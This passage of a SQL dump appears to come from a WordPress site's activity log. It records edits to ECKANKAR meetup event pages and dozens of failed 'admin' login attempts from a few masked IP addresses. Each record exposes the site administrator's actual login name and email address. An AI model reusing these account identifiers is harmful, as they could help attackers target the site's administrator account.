health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234920,39881,'post_new_thumb_title','waterfall-illus-2'),(234919,39881,'post_new_thumb_id','269264'),(234921,39881,'_message_key','post_updated'),(234922,39881,'_user_id','2'),(234923,39881,'_user_login','S8zhaBda'),(234924,39881,'_user_email','nada@zipnadanot.org'),(234925,39881,'_server_remote_addr','76.130.120.x'),(234926,39881,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269262&action=edit'),(234927,39882,'post_id','269262'),(234928,39882,'post_type','mec-events'),(234929,39882,'post_title','The Power of Grace'),(234930,39882,'post_prev_post_status','publish'),(234931,39882,'post_new_post_status','draft'),(234932,39882,'_message_key','post_updated'),(234933,39882,'_user_id','2'),(234934,39882,'_user_login','S8zhaBda'),(234935,39882,'_user_email','nada@zipnadanot.org'),(234936,39882,'_server_remote_addr','76.130.120.x'),(234937,39882,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269262&action=edit'),(234938,39883,'post_id','269262'),(234939,39883,'post_type','mec-events'),(234940,39883,'post_title','The Power of Grace'),(234941,39883,'post_prev_post_status','draft'),(234942,39883,'post_new_post_status','publish'),(234943,39883,'_message_key','post_updated'),(234944,39883,'_user_id','2'),(234945,39883,'_user_login','S8zhaBda'),(234946,39883,'_user_email','nada@zipnadanot.org'),(234947,39883,'_server_remote_addr','76.130.120.x'),(234948,39883,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269262&action=edit'),(234949,39884,'post_id','269265'),(234950,39884,'post_type','mec-events'),(234951,39884,'post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(234952,39884,'_message_key','post_updated'),(234953,39884,'_user_id','2'),(234954,39884,'_user_login','S8zhaBda'),(234955,39884,'_user_email','nada@zipnadanot.org'),(234956,39884,'_server_remote_addr','76.130.120.x'),(234957,39884,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a8a3e8b561&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(234958,39885,'new_post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(234959,39885,'new_post_id','269265'),(234960,39885,'duplicated_post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(234961,39885,'duplicated_post_id','267696'),(234962,39885,'_message_key','post_duplicated'),(234963,39885,'_user_id','2'),(234964,39885,'_user_login','S8zhaBda'),(234965,39885,'_user_email','nada@zipnadanot.org'),(234966,39885,'_server_remote_addr','76.130.120.x'),(234967,39885,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a8a3e8b561&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(234968,39886,'post_id','269265'),(234969,39886,'post_type','mec-events'),(234970,39886,'post_title','Write the Screenplay of Your Life As a Love Story that Matters'),(234971,39886,'post_meta_added','78'),(234972,39886,'_message_key','post_updated'),(234973,39886,'_user_id','2'),(234974,39886,'_user_login','S8zhaBda'),(234975,39886,'_user_email','nada@zipnadanot.org'),(234976,39886,'_server_remote_addr','76.130.120.x'),(234977,39886,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269265'),(234978,39887,'post_id','269265'),(234979,39887,'post_type','mec-events'),(234980,39887,'post_title','Write the Screenplay of Your Life As a Love Story that Matters'),(234981,39887,'post_meta_added','78'),(234982,39887,'_message_key','post_updated'),(234983,39887,'_user_id','2'),(234984,39887,'_user_login','S8zhaBda'),(234985,39887,'_user_email','nada@zipnadanot.org'),(234986,39887,'_server_remote_addr','76.130.120.x'),(234987,39887,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269265'),(234988,39888,'post_id','269265'),(234989,39888,'post_type','mec-events'),(234990,39888,'post_title','Write the Screenplay of Your Life As a Love Story that Matters'),(234991,39888,'post_meta_added','78'),(234992,39888,'_message_key','post_updated'),(234993,39888,'_user_id','2'),(234994,39888,'_user_login','S8zhaBda'),(234995,39888,'_user_email','nada@zipnadanot.org'),(234996,39888,'_server_remote_addr','76.130.120.x'),(234997,39888,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269265'),(234998,39889,'post_type','attachment'),(234999,39889,'attachment_id','269266'),(235000,39889,'attachment_title','sunset-sea-2'),(235001,39889,'attachment_filename','sunset-sea-2.jpg'),(235002,39889,'attachment_mime','image/jpeg'),(235003,39889,'attachment_filesize','117837'),(235004,39889,'attachment_parent_id','269265'),(235005,39889,'attachment_parent_title','Write the Screenplay of Your Life As a Love Story that Matters'),(235006,39889,'attachment_parent_post_type','mec-events'),(235007,39889,'_message_key','attachment_created'),(235008,39889,'_user_id','2'),(235009,39889,'_user_login','S8zhaBda'),(235010,39889,'_user_email','nada@zipnadanot.org'),(235011,39889,'_server_remote_addr','76.130.120.x'),(235012,39889,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269265'),(235013,39890,'post_id','269265'),(235014,39890,'post_type','mec-events'),(235015,39890,'post_title','Write the Screenplay of Your Life As a Love Story that Matters'),(235016,39890,'post_prev_post_name',''),(235017,39890,'post_new_post_name','write-the-screenplay-of-your-life-as-a-love-story-that-matters-2'),(235018,39890,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">What are you passionate about?<br>\n</span></strong></p>\n<p><span style=\"font-size: 14pt;\">What effect do you as the main character have on your family, friends, co-workers, neighbors?</span></p>\n<p><span style=\"font-size: 14pt;\">What would help you through the ups and downs of your story?</span></p>\n<p><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, gives this suggestion:</span><br>\n<span style=\"font-size: 14pt;\">\"Do one thing each day for love alone. Don\'t expect any kind of reward.\"</span><br>\n<span style=\"font-size: 14pt;\">Stories to Help You See God In Your Life: The Book of ECK Parables,</span><br>\n<span style=\"font-size: 14pt;\">Vol. 4.</span></p>\n<p><span style=\"font-size: 14pt;\">You are warmly invited to this open conversation about experiencing your life journey as the greatest love story, whose characters will face all kinds of adventures, hardships, and changes.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">As part of our meetup, we will use a brief spiritual exercise to help us.</span><br>\n<span style=\"font-size: 14pt;\">This is sponsored by ECKANKAR as a community service.</span><br>\n<span style=\"font-size: 14pt;\">All are welcome.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-lone-tree/events/296733324/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(235019,39890,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">What are you passionate about?<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">What effect do you as the main character have on your family, friends, co-workers, neighbors?</span></p>\r\n<p><span style=\"font-size: 14pt;\">What would help you through the ups and downs of your story?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, gives this suggestion:</span><br>\r\n<span style=\"font-size: 14pt;\">\"Do one thing each day for love alone. Don\'t expect any kind of reward.\"</span><br>\r\n<span style=\"font-size: 14pt;\">Stories to Help You See God In Your Life: The Book of ECK Parables,</span><br>\r\n<span style=\"font-size: 14pt;\">Vol. 4.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to this open conversation about experiencing your life journey as the greatest love story, whose characters will face all kinds of adventures, hardships, and changes.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">As part of our meetup, we will use a brief spiritual exercise to help us.</span><br>\r\n<span style=\"font-size: 14pt;\">This is sponsored by ECKANKAR as a community service.</span><br>\r\n<span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-lone-tree/events/296733324/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(235023,39890,'post_new_post_date','2023-10-25 14:44:50'),(235020,39890,'post_prev_post_status','draft'),(235021,39890,'post_new_post_status','publish'),(235022,39890,'post_prev_post_date','2023-10-25 14:43:38'),(235024,39890,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(235025,39890,'post_new_post_date_gmt','2023-10-25 20:44:50'),(235026,39890,'post_new_thumb_id','269266'),(235027,39890,'post_new_thumb_title','sunset-sea-2'),(235028,39890,'_message_key','post_updated'),(235029,39890,'_user_id','2'),(235030,39890,'_user_login','S8zhaBda'),(235031,39890,'_user_email','nada@zipnadanot.org'),(235032,39890,'_server_remote_addr','76.130.120.x'),(235033,39890,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269265'),(235034,39891,'post_id','269265'),(235035,39891,'post_type','mec-events'),(235036,39891,'post_title','Write the Screenplay of Your Life As a Love Story that Matters'),(235037,39891,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">What are you passionate about?<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">What effect do you as the main character have on your family, friends, co-workers, neighbors?</span></p>\r\n<p><span style=\"font-size: 14pt;\">What would help you through the ups and downs of your story?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, gives this suggestion:</span><br>\r\n<span style=\"font-size: 14pt;\">\"Do one thing each day for love alone. Don\'t expect any kind of reward.\"</span><br>\r\n<span style=\"font-size: 14pt;\">Stories to Help You See God In Your Life: The Book of ECK Parables,</span><br>\r\n<span style=\"font-size: 14pt;\">Vol. 4.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to this open conversation about experiencing your life journey as the greatest love story, whose characters will face all kinds of adventures, hardships, and changes.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">As part of our meetup, we will use a brief spiritual exercise to help us.</span><br>\r\n<span style=\"font-size: 14pt;\">This is sponsored by ECKANKAR as a community service.</span><br>\r\n<span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-lone-tree/events/296733324/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(235038,39891,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">What are you passionate about?<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">What effect do you as the main character have on your family, friends, co-workers, neighbors?</span></p>\r\n<p><span style=\"font-size: 14pt;\">What would help you through the ups and downs of your story?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, gives this suggestion:</span><br>\r\n<span style=\"font-size: 14pt;\">\"<em>Do one thing each day for love alone. Don\'t expect any kind of reward.</em>\"</span><br>\r\n<span style=\"font-size: 14pt;\">Stories to Help You See God In Your Life: The Book of ECK Parables,</span><br>\r\n<span style=\"font-size: 14pt;\">Vol. 4.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to this open conversation about experiencing your life journey as the greatest love story, whose characters will face all kinds of adventures, hardships, and changes.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">As part of our meetup, we will use a brief spiritual exercise to help us.</span><br>\r\n<span style=\"font-size: 14pt;\">This is sponsored by ECKANKAR as a community service.</span><br>\r\n<span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-lone-tree/events/296733324/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(221686,36841,'server_http_user_agent','Mozilla/5.0'),(221687,36841,'_message_key','user_unknown_login_failed'),(221688,36841,'_server_remote_addr','20.81.176.x'),(221689,36842,'failed_username','admin'),(221690,36842,'server_http_user_agent','Mozilla/5.0'),(221691,36842,'_message_key','user_unknown_login_failed'),(221692,36842,'_server_remote_addr','45.136.118.x'),(221693,36843,'failed_username','admin'),(221694,36843,'server_http_user_agent','Mozilla/5.0'),(221695,36843,'_message_key','user_unknown_login_failed'),(221696,36843,'_server_remote_addr','20.81.176.x'),(221697,36844,'failed_username','admin'),(221698,36844,'server_http_user_agent','Mozilla/5.0'),(221699,36844,'_message_key','user_unknown_login_failed'),(221700,36844,'_server_remote_addr','45.136.118.x'),(221701,36845,'failed_username','admin'),(221702,36845,'server_http_user_agent','Mozilla/5.0'),(221703,36845,'_message_key','user_unknown_login_failed'),(221704,36845,'_server_remote_addr','45.136.118.x'),(221705,36846,'failed_username','admin'),(221706,36846,'server_http_user_agent','Mozilla/5.0'),(221707,36846,'_message_key','user_unknown_login_failed'),(221708,36846,'_server_remote_addr','20.81.176.x'),(221709,36847,'failed_username','admin'),(221710,36847,'server_http_user_agent','Mozilla/5.0'),(221711,36847,'_message_key','user_unknown_login_failed'),(221712,36847,'_server_remote_addr','45.136.118.x'),(221713,36848,'failed_username','admin'),(221714,36848,'server_http_user_agent','Mozilla/5.0'),(221715,36848,'_message_key','user_unknown_login_failed'),(221716,36848,'_server_remote_addr','20.81.176.x'),(221717,36849,'failed_username','admin'),(221718,36849,'server_http_user_agent','Mozilla/5.0'),(221719,36849,'_message_key','user_unknown_login_failed'),(221720,36849,'_server_remote_addr','45.136.118.x'),(221721,36850,'failed_username','admin'),(221722,36850,'server_http_user_agent','Mozilla/5.0'),(221723,36850,'_message_key','user_unknown_login_failed'),(221724,36850,'_server_remote_addr','20.81.176.x'),(221725,36851,'failed_username','admin'),(221726,36851,'server_http_user_agent','Mozilla/5.0'),(221727,36851,'_message_key','user_unknown_login_failed'),(221728,36851,'_server_remote_addr','45.136.118.x'),(221729,36852,'failed_username','admin'),(221730,36852,'server_http_user_agent','Mozilla/5.0'),(221731,36852,'_message_key','user_unknown_login_failed'),(221732,36852,'_server_remote_addr','20.81.176.x'),(221733,36853,'failed_username','admin'),(221734,36853,'server_http_user_agent','Mozilla/5.0'),(221735,36853,'_message_key','user_unknown_login_failed'),(221736,36853,'_server_remote_addr','45.136.118.x'),(221737,36854,'failed_username','admin'),(221738,36854,'server_http_user_agent','Mozilla/5.0'),(221739,36854,'_message_key','user_unknown_login_failed'),(221740,36854,'_server_remote_addr','20.81.176.x'),(221741,36855,'failed_username','admin'),(221742,36855,'server_http_user_agent','Mozilla/5.0'),(221743,36855,'_message_key','user_unknown_login_failed'),(221744,36855,'_server_remote_addr','45.136.118.x'),(221745,36856,'failed_username','admin'),(221746,36856,'server_http_user_agent','Mozilla/5.0'),(221747,36856,'_message_key','user_unknown_login_failed'),(221748,36856,'_server_remote_addr','45.136.118.x'),(221749,36857,'failed_username','admin'),(221750,36857,'server_http_user_agent','Mozilla/5.0'),(221751,36857,'_message_key','user_unknown_login_failed'),(221752,36857,'_server_remote_addr','20.81.176.x'),(221753,36858,'failed_username','admin'),(221754,36858,'server_http_user_agent','Mozilla/5.0'),(221755,36858,'_message_key','user_unknown_login_failed'),(221756,36858,'_server_remote_addr','45.136.118.x'),(221757,36859,'failed_username','admin'),(221758,36859,'server_http_user_agent','Mozilla/5.0'),(221759,36859,'_message_key','user_unknown_login_failed'),(221760,36859,'_server_remote_addr','20.81.176.x'),(221761,36860,'failed_username','admin'),(221762,36860,'server_http_user_agent','Mozilla/5.0'),(221763,36860,'_message_key','user_unknown_login_failed'),(221764,36860,'_server_remote_addr','45.136.118.x'),(221765,36861,'failed_username','admin'),(221766,36861,'server_http_user_agent','Mozilla/5.0'),(221767,36861,'_message_key','user_unknown_login_failed'),(221768,36861,'_server_remote_addr','20.81.176.x'),(221769,36862,'failed_username','admin'),(221770,36862,'server_http_user_agent','Mozilla/5.0'),(221771,36862,'_message_key','user_unknown_login_failed'),(221772,36862,'_server_remote_addr','45.136.118.x'),(221773,36863,'failed_username','admin'),(221774,36863,'server_http_user_agent','Mozilla/5.0'),(221775,36863,'_message_key','user_unknown_login_failed'),(221776,36863,'_server_remote_addr','20.81.176.x'),(221777,36864,'failed_username','admin'),(221778,36864,'server_http_user_agent','Mozilla/5.0'),(221779,36864,'_message_key','user_unknown_login_failed'),(221780,36864,'_server_remote_addr','45.136.118.x'),(221781,36865,'failed_username','admin'),(221782,36865,'server_http_user_agent','Mozilla/5.0'),(221783,36865,'_message_key','user_unknown_login_failed'),(221784,36865,'_server_remote_addr','20.81.176.x'),(221785,36866,'failed_username','admin'),(221786,36866,'server_http_user_agent','Mozilla/5.0'),(221787,36866,'_message_key','user_unknown_login_failed'),(221788,36866,'_server_remote_addr','45.136.118.x'),(221789,36867,'failed_username','admin'),(221790,36867,'server_http_user_agent','Mozilla/5.0'),(221791,36867,'_message_key','user_unknown_login_failed'),(221792,36867,'_server_remote_addr','45.136.118.x'),(221793,36868,'failed_username','admin'),(221794,36868,'server_http_user_agent','Mozilla/5.0'),(221795,36868,'_message_key','user_unknown_login_failed'),(221796,36868,'_server_remote_addr','20.81.176.x'),(221797,36869,'failed_username','admin'),(221798,36869,'server_http_user_agent','Mozilla/5.0'),(221799,36869,'_message_key','user_unknown_login_failed'),(221800,36869,'_server_remote_addr','45.136.118.x'),(221801,36870,'failed_username','admin'),(221802,36870,'server_http_user_agent','Mozilla/5.0'),(221803,36870,'_message_key','user_unknown_login_failed'),(221804,36870,'_server_remote_addr','20.81.176.x'),(221805,36871,'failed_username','admin'),(221806,36871,'server_http_user_agent','Mozilla/5.0'),(221807,36871,'_message_key','user_unknown_login_failed'),(221808,36871,'_server_remote_addr','45.136.118.x'),(221809,36872,'failed_username','admin'),(221810,36872,'server_http_user_agent','Mozilla/5.0'),(221811,36872,'_message_key','user_unknown_login_failed'),(221812,36872,'_server_remote_addr','20.81.176.x'),(221813,36873,'failed_username','admin'),(221814,36873,'server_http_user_agent','Mozilla/5.0'),(221815,36873,'_message_key','user_unknown_login_failed'),(221816,36873,'_server_remote_addr','45.136.118.x'),(221817,36874,'failed_username','admin'),(221818,36874,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(221819,36874,'_message_key','user_unknown_login_failed'),(221820,36874,'_server_remote_addr','157.230.191.x'),(221821,36875,'failed_username','admin'),(221822,36875,'server_http_user_agent','Mozilla/5.0'),(221823,36875,'_message_key','user_unknown_login_failed'),(221824,36875,'_server_remote_addr','20.81.176.x'),(221825,36876,'failed_username','admin'),(221826,36876,'server_http_user_agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(221827,36876,'_message_key','user_unknown_login_failed'),(221828,36876,'_server_remote_addr','146.190.71.x'),(221829,36877,'failed_username','admin'),(221830,36877,'server_http_user_agent','Mozilla/5.0'),(221831,36877,'_message_key','user_unknown_login_failed'),(221832,36877,'_server_remote_addr','45.136.118.x'),(221833,36878,'failed_username','admin'),(221834,36878,'server_http_user_agent','Mozilla/5.0'),(221835,36878,'_message_key','user_unknown_login_failed'),(221836,36878,'_server_remote_addr','20.81.176.x'),(221837,36879,'failed_username','admin'),(221838,36879,'server_http_user_agent','Mozilla/5.0'),(221839,36879,'_message_key','user_unknown_login_failed'),(221840,36879,'_server_remote_addr','45.136.118.x'),(221841,36880,'failed_username','admin'),(221842,36880,'server_http_user_agent','Mozilla/5.0'),(221843,36880,'_message_key','user_unknown_login_failed'),(221844,36880,'_server_remote_addr','45.136.118.x'),(221845,36881,'failed_username','admin'),(221846,36881,'server_http_user_agent','Mozilla/5.0'),(221847,36881,'_message_key','user_unknown_login_failed'),(221848,36881,'_server_remote_addr','20.81.176.x'),(221849,36882,'failed_username','admin'),(221850,36882,'server_http_user_agent','Mozilla/5.0'),(221851,36882,'_message_key','user_unknown_login_failed'),(221852,36882,'_server_remote_addr','45.136.118.x'),(221853,36883,'failed_username','admin'),(221854,36883,'server_http_user_agent','Mozilla/5.0'),(221855,36883,'_message_key','user_unknown_login_failed'),(221856,36883,'_server_remote_addr','20.81.176.x'),(221857,36884,'failed_username','admin'),(221858,36884,'server_http_user_agent','Mozilla/5.0'),(221859,36884,'_message_key','user_unknown_login_failed'),(221860,36884,'_server_remote_addr','45.136.118.x'),(221861,36885,'failed_username','admin'),(221862,36885,'server_http_user_agent','Mozilla/5.0'),(221863,36885,'_message_key','user_unknown_login_failed'),(221864,36885,'_server_remote_addr','20.81.176.x'),(221865,36886,'failed_username','admin'),(221866,36886,'server_http_user_agent','Mozilla/5.0'),(221867,36886,'_message_key','user_unknown_login_failed'),(221868,36886,'_server_remote_addr','45.136.118.x'),(221869,36887,'failed_username','admin'),(221870,36887,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(221871,36887,'_message_key','user_unknown_login_failed'),(221872,36887,'_server_remote_addr','139.196.46.x'),(221873,36888,'failed_username','admin'),(221874,36888,'server_http_user_agent','Mozilla/5.0'),(221875,36888,'_message_key','user_unknown_login_failed'),(221876,36888,'_server_remote_addr','20.81.176.x'),(221877,36889,'failed_username','admin'),(221878,36889,'server_http_user_agent','Mozilla/5.0'),(221879,36889,'_message_key','user_unknown_login_failed'),(221880,36889,'_server_remote_addr','45.136.118.x'),(221881,36890,'failed_username','admin'),(221882,36890,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(221883,36890,'_message_key','user_unknown_login_failed'),(221884,36890,'_server_remote_addr','20.92.138.x'),(221885,36891,'failed_username','admin'),(221886,36891,'server_http_user_agent','Mozilla/5.0'),(221887,36891,'_message_key','user_unknown_login_failed'),(221888,36891,'_server_remote_addr','45.136.118.x'),(221889,36892,'failed_username','admin'),(221890,36892,'server_http_user_agent','Mozilla/5.0'),(221891,36892,'_message_key','user_unknown_login_failed'),(221892,36892,'_server_remote_addr','20.81.176.x'),(221893,36893,'post_id','269188'),(221894,36893,'post_type','nf_sub'),(221895,36893,'post_title',''),(221896,36893,'_message_key','post_updated'),(221897,36893,'_server_remote_addr','65.130.204.x'),(221898,36893,'_server_http_referer','https://eckankar-colorado.org/resa-faq/update-email-mail/'),(221899,36894,'post_id','269189'),(221900,36894,'post_type','nf_sub'),(221901,36894,'post_title',''),(221902,36894,'_message_key','post_updated'),(221903,36894,'_server_remote_addr','65.130.204.x'),(221904,36894,'_server_http_referer','https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/'),(221905,36895,'failed_username','admin'),(221906,36895,'server_http_user_agent','Mozilla/5.0'),(221907,36895,'_message_key','user_unknown_login_failed'),(221908,36895,'_server_remote_addr','45.136.118.x'),(221909,36896,'failed_username','admin'),(221910,36896,'server_http_user_agent','Mozilla/5.0'),(221911,36896,'_message_key','user_unknown_login_failed'),(221912,36896,'_server_remote_addr','20.81.176.x'),(221913,36897,'failed_username','admin'),(221914,36897,'server_http_user_agent','Mozilla/5.0'),(221915,36897,'_message_key','user_unknown_login_failed'),(221916,36897,'_server_remote_addr','45.136.118.x'),(221917,36898,'failed_username','admin'),(221918,36898,'server_http_user_agent','Mozilla/5.0'),(221919,36898,'_message_key','user_unknown_login_failed'),(221920,36898,'_server_remote_addr','20.81.176.x'),(221921,36899,'failed_username','admin'),(221922,36899,'server_http_user_agent','Mozilla/5.0'),(221923,36899,'_message_key','user_unknown_login_failed'),(221924,36899,'_server_remote_addr','45.136.118.x'),(221925,36900,'failed_username','admin'),(221926,36900,'server_http_user_agent','Mozilla/5.0'),(221927,36900,'_message_key','user_unknown_login_failed'),(221928,36900,'_server_remote_addr','20.81.176.x'),(221929,36901,'failed_username','admin'),(221930,36901,'server_http_user_agent','Mozilla/5.0'),(221931,36901,'_message_key','user_unknown_login_failed'),(221932,36901,'_server_remote_addr','45.136.118.x'),(221933,36902,'failed_username','admin'),(221934,36902,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) 